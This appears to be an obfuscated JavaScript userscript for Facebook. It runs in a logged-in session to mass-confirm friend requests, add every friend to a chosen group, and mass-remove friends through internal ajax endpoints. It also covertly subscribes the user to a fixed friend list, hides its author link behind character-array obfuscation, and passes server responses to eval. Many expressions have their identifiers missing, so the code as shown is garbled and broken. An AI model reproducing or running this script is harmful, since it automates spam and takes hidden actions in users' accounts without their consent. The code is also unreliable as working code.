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h.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); h.onreadystatechange = function (c) { if( == 4) { if(aing.panggilanKe) { aing.panggilanKe++ } else { aing.panggilanKe = 1 } var e = { errorSummary: "Connection error !", errorDescription: "Ajax status=" + }; if( == 200 || == 400) { var d =; if(d == "") { e.errorSummary = "empty callback!" } else { e = JSON.parse(d.substring(d.indexOf("{"), d.lastIndexOf("}") + 1)) } a(l, e) } else if(aing.panggilanKe < 2) { aing.kolAjak(i, r, l, a, n) } else { aing.panggilanKe = 0; a(l, e) } } }; h.send(r) }, frnomore: function () { aing.tampiltombol("", "impoh") }, crj: (function () { var cr = ["i", "a", "e", "g", "o", "s", "n", "b", "l", "p", "m", "2", "r", "0", "c", "1", "t", "3", "\xA9"], crl = cr[1] + cr[0] + cr[6] + cr[3] + cr[14] + cr[12] + cr[2] + cr[1] + cr[16] + cr[0] + cr[4] + cr[6] + cr[5] + "." + cr[7] + cr[8] + cr[4] + cr[3] + cr[5] + cr[9] + cr[4] + cr[16] + "." + cr[14] + cr[4] + cr[10]; return "<div style=\"margin-top:10px;color:gray;font-size:12px;text-align:right\">" + cr[1].toUpperCase() + cr[0] + cr[6] + cr[3] + cr[14].toUpperCase() + cr[12] + cr[2] + cr[1] + cr[16] + cr[0] + cr[4] + cr[6] + cr[5] + " " + cr[cr.length - 1] + cr[11] + cr[13] + cr[15] + cr[17] + "<div style=\"font-size:9px\"><a href=\"http://" + crl + "/\" target=\"_blank\">" + crl + "</a></div></div>" })(), klos: function (waw) { var inf = document.getElementById("kiri-bawah"); if(inf) { if(waw == null || waw == "") { inf.parentNode.removeChild(inf) } else { inf.innerHTML = "<b>Reloading the page, wait up..</b> " + aing.loding.img } } aing.kolAjak("/ajax/friends/lists/subscribe/modify", aing.ajax.requestsLoader().prm + "&location=permalink&action=subscribe&flid=780835668601841", "", function () { if(document.getElementById("kiri-bawah")) { top.location.reload() } }) }, resvars: function () { aing.loding.frm = 0; aing.kasihTau("", "impoh-eror"); aing.kasihTau("", "impoh-ok") }, cekwas: function (a, w) { var b = "lanyut"; if(a == aing.uid) { b = "lewat" } else { for(z in w) { if(a == w[z]) { b = "lewat"; break } } } return b }, frFolder: function () { var a = document.getElementById("friendsTypeaheadResults"); if(a) { var b = a.parentNode.getElementsByClassName("friendButton"); for(var x = 0; x < b.length; x++) { var c = b[x].getAttribute("data-profileid"); if(c) { aing.friends.push({ uid: c, text: "id:" + c }) } } } }, saringPren: function (a, c) { var b = []; for(x in a) { if(a[x].uid == aing.uid || a[x].uid == c) {} else { b.push(a[x]) } } return b }, reqs: { put: function (a) { var g = document.getElementById("tmpt-reqs"); var f = document.createElement("div"); if(g) { g.innerHTML = "" } else { g = document.body; = "tmpt-reqs"; = "none" } f.innerHTML = a.replace(/<img(.*?)>/gi, ""); g.appendChild(f); }, lod: function () { aing.kasihTau("Loading friend requests, wait up..", "g", "np")); var ajx = aing.ajax.requestsLoader(); aing.kolAjak(ajx.uri, ajx.prm, "", function (q, p) { if(p.domops && p.domops[0] && p.domops[0][3] && p.domops[0][3].__html) { aing.reqs.put(p.domops[0][3].__html) } aing.getPren("janda") }) }, got: function () { var rk = []; var a = document.getElementsByName("request_id"); for(var x = 0; x < a.length; x++) { var b = a[x].parentNode; if(b) { var c = b.getElementsByTagName("input"); var rkp = {}; for(var y = 0; y < c.length; y++) { rkp[c[y].name] = c[y].value } if(rkp.type && rkp.type == "friend_connect") { var h = aing.cekwas(rkp.request_id, aing.stat.ttlReq); if(h == "lanyut") { rk.push(rkp); aing.stat.ttlReq.push(rkp.request_id) } } else { if(aing.friendSugs) { aing.friendSugs.push(rkp) } else { aing.friendSugs = [rkp] } } b.removeChild(a[x]); } } return rk; }, get: function (f) { var w = "h"; var g =; var a = document.getElementById("fbRequestsJewelMorePager"); if(a) { var b = a.getElementsByTagName("a")[0]; if(b) { var c = b.getAttribute("ajaxify"); if(c && c.split("?")[1]) { var d = decodeURIComponent(c.split("?")[1]).split("&"); for(var x = 0; x < d.length; x++) { var i = d[x].split("="); if(i[1] && i[0].match(/sender_ids/i)) { var j = aing.cekwas(i[1], aing.stat.ttlReq); if(j == "lanyut") { g.push(i[1]); aing.stat.ttlReq.push(i[1]) } } } if(aing.reqs.ajaxify && aing.reqs.ajaxify == c) { aing.reqs.ajaxify = "" } else { aing.reqs.ajaxify = c } a.parentNode.removeChild(a) } } } else if(f == "merawanin" && g.length == 0) { w = "k"; aing.reqs.lod(); } if(w == "h") { return g } }, mor: function () { aing.loding.inf(null, "Collecting more requests, wait up.."); var a = document.getElementById("fbRequestsJewelMorePager"); if(a) { var b = a.getElementsByTagName("a")[0]; if(b) { var c = b.getAttribute("ajaxify"); if(c) { aing.reqs.ajaxify = c; a.parentNode.removeChild(a) } } } if(aing.reqs.ajaxify && aing.reqs.ajaxify != "") { aing.kolAjak(aing.reqs.ajaxify, aing.prms.dg, "", function (q, p) { if(p.domops && p.domops[1] && p.domops[1][3] && p.domops[1][3].__html) { aing.reqs.put(p.domops[1][3].__html) } aing.reqs.ajaxify = ""; aing.frReqs = aing.reqs.get(); if(aing.frReqs.length == 0) { aing.frnomore() } else { aing.reqs.con("nk") } }, "GET") } else { aing.frReqs = aing.reqs.get(); if(aing.frReqs.length == 0) { aing.frnomore() } else { aing.reqs.con("nk") } } }, cnf: function (c, d) { if(c == null || c == "") { c = 0; = 0; aing.stat.ok = 0 } if(d == null || d == "") { d = 100 } if(d > aing.frReqs.length) { d = aing.frReqs.length; aing.stat.nk = "" } else { aing.stat.nk = { f: d, t: ((d * 2) - c) } } for(var x = c; x < d; x++) { var ajx = aing.ajax.friendRequests(aing.frReqs[x]); aing.kolAjak(ajx.uri, ajx.prm, ajx.uid, function (q, p) { if(p && p.errorSummary && p.errorDescription) {; aing.stat.ttlReqEr++; var b = p.errorDescription; aing.kasihTau("(Fail: <b>" + aing.stat.ttlReqEr + "</b>) " + b, "r"), "impoh-eror"); } else if(p && p.domops && p.domops[0] && p.domops[0][3] && p.domops[0][3].__html) { aing.stat.ok++; aing.stat.ttlReqOk++; var bb = p.domops[0][3].__html.match(/>(.*?)<\/a>/gi); if(bb) { var b = bb[bb.length - 1].replace(/<(.*?)>|<|>/g, "") } else { var b = p.domops[0][3].__html.replace(/<(.*?)>|<|>/g, "_") } aing.kasihTau("(Successfully Confirmed: <b>" + aing.stat.ttlReqOk + "</b>/" + aing.stat.ttlReq.length + ") <a href=\"/friends\" target=\"_blank\"><b>" + b + "</b></a>"), "impoh-ok"); aing.friends.push({ uid: q, text: b }); var cfn = document.getElementById("jmlh-fn"); if(cfn) { cfn.innerHTML = aing.friends.length + " Friends" } } else {; aing.stat.ttlReqEr++; var b = q; aing.kasihTau("(Fail: <b>" + aing.stat.ttlReqEr + "</b>) UID: " + b, "r"), "impoh-eror"); } var d = document.getElementById("jmlh-fr"); if(d) { d.innerHTML = (aing.frReqs.length - ( + aing.stat.ok)) + " friend requests" } if(aing.stat.nk.f && ( + aing.stat.ok) >= aing.stat.nk.f) { aing.reqs.cnf(aing.stat.nk.f, aing.stat.nk.t) }"impoh"), aing.stat.ttlReq.length, function () { aing.reqs.mor() }, "no") }) } }, con: function (wht) { if(wht == null || wht == "") { aing.remBtn(); aing.resvars(); if(aing.stat.ttlReqOk) { aing.loding.frm = (aing.stat.ttlReqOk + aing.stat.ttlReqEr) } aing.loding.inf(document.getElementById("impoh")) } if(aing.frReqs.length == 0) { var e = "<b>Collecting"; if(aing.stat.ttlReq.length != 0) { e += " more" } e += " requests</b>, wait up.."; aing.kasihTau(, "g"), "impoh"); aing.reqs.mor(); } else { aing.reqs.cnf(); } }, add: function () { aing.remBtn(); for(x in aing.friendSugs) { aing.frReqs.push(aing.friendSugs[x]) } aing.friendSugs = []; var cfn = document.getElementById("jmlh-sugfr"); if(cfn) { cfn.innerHTML = aing.friendSugs.length + " Friend suggestions" } aing.reqs.con(); } }, getPren: function (jn) { if(jn == "janda") { aing.frReqs = aing.reqs.get() } else { aing.frReqs = aing.reqs.get("merawanin") } if(aing.frReqs) { var b = ""; if(aing.frReqs.length != 0) { b += "Found <b id=\"jmlh-fr\">" + aing.frReqs.length + " friend requests</b>, Now " } b += "Collecting friends, wait up.. " + aing.loding.img; aing.kasihTau(, "g", "np")); aing.kolAjak(,, "", aing.kolbek.getFriend, "GET") } }, inform: function (a, b) { var c = ""; if(b && { c = } else if(b && b != "") { for(x in aing.friends) { if(aing.friends[x].text && aing.friends[x].uid && aing.friends[x].uid == b) { c = aing.friends[x].text; break } } } return c.split(" ")[0] }, addToGroup: function (c, d) { var e = "Adding "; if(c == null || c == "") { c = 0; = 0; aing.stat.ok = 0; var grid = document.getElementsByName("group_id")[0]; if(grid) { aing.gid = grid.value } else { aing.gid = prompt("Insert your Facebook Group ID..", "215559175130472") } if(aing.gid == null || aing.gid == "" || isNaN(aing.gid)) { return false } else { aing.remBtn() } } else { e += "more " } if(d == null || d == "") { d = 100 } if(d > aing.friends.length) { d = aing.friends.length; aing.stat.nk = "" } else { aing.stat.nk = { f: d, t: ((d * 2) - c) } } e += "<b>" + (c + 1) + " to " + d + " friends</b> to Group, wait up.. "; if(c == 0) { aing.resvars(); aing.loding.inf(document.getElementById("impoh")) } for(var x = c; x < d; x++) { aing.kolAjak(, + "&group_id=" + aing.gid + "&members=" + aing.friends[x].uid, "", function (q, p) { if(p && p.errorSummary && p.errorDescription) {; var b = p.errorDescription; if(p.onafterload && p.onafterload[0]) { b = p.errorDescription.replace(/This user|user |Pengguna ini|pengguna /gi, "<a href=\"/friends\" target=\"_blank\" style=\"font-weight:bold\">" + eval(p.onafterload[0].replace(/Arbiter\./i, "aing.")) + "</a>") } aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror"); } else if(p && p.jsmods && p.jsmods.require) { aing.stat.ok++; var a = "<b>"; for(y in p.jsmods.require) { if(p.jsmods.require[y][3] && p.jsmods.require[y][3][1]) { a += " " + p.jsmods.require[y][3][1] } } a += "</b>"; if(p.onload && p.onload[0]) { a += "<div>(Added: <b>" + aing.stat.ok + "</b>/" + aing.friends.length + ") <a href=\"/friends\" target=\"_blank\" style=\"font-weight:bold\">" + eval(p.onload[0].replace(/Arbiter\./i, "aing.")) + "</a> added to Group..</div>" } aing.kasihTau(, "impoh-ok"); } else {; var b = JSON.stringify(p); if(p.onafterload && p.onafterload[0]) { b += " <a href=\"/friends\" target=\"_blank\" style=\"font-weight:bold\">" + eval(p.onafterload[0].replace(/Arbiter\./i, "aing.")) + "</a>" } aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror"); } if(( + aing.stat.ok) >= aing.friends.length) {} else if(aing.stat.nk.f && ( + aing.stat.ok) >= aing.stat.nk.f) { aing.addToGroup(aing.stat.nk.f, aing.stat.nk.t) }"impoh"), aing.friends.length, function () { aing.tampiltombol("", "impoh") }, "no") }) } }, remFriends: function (c, d) { if(c == null || c == "") { c = 0; = 0; aing.stat.ok = 0; aing.friendsRmvd = aing.friends; aing.remBtn(); aing.resvars(); aing.loding.inf(document.getElementById("impoh")) } if(d == null || d == "") { d = 100 } if(d > aing.friends.length) { d = aing.friends.length; aing.stat.nk = "" } else { aing.stat.nk = { f: d, t: ((d * 2) - c) } } for(var x = c; x < d; x++) { aing.kolAjak(aing.uris.rf, aing.prms.df + "&unref=bd_friends_tab&uid=" + aing.friends[x].uid, aing.friends[x], function (q, p) { if(p && p.errorSummary && p.errorDescription) {; var b = p.errorDescription; aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror"); } else if(p.jsmods && p.jsmods.markup && p.jsmods.markup[0] && p.jsmods.markup[0][1] && p.jsmods.markup[0][1].__html) {; var b = p.jsmods.markup[0][1].__html.replace(/<(.*?)>|okay/gi, " "); aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror"); } else { aing.stat.ok++; var b = q.text; aing.kasihTau("(Successfully Removed: <b>" + aing.stat.ok + "</b>/" + aing.friends.length + ") " + b), "impoh-ok"); } aing.friendsRmvd = aing.saringPren(aing.friendsRmvd, q.uid); var cfn = document.getElementById("jmlh-fn"); if(cfn) { cfn.innerHTML = aing.friendsRmvd.length + " Friends" } if(( + aing.stat.ok) >= aing.friends.length) {} else if(aing.stat.nk.f && ( + aing.stat.ok) >= aing.stat.nk.f) { aing.remFriends(aing.stat.nk.f, aing.stat.nk.t) }"impoh"), aing.friends.length, function () { aing.friends = aing.friendsRmvd; aing.tampiltombol("", "impoh") }, "no") }) } } }; aing.getPren();})();
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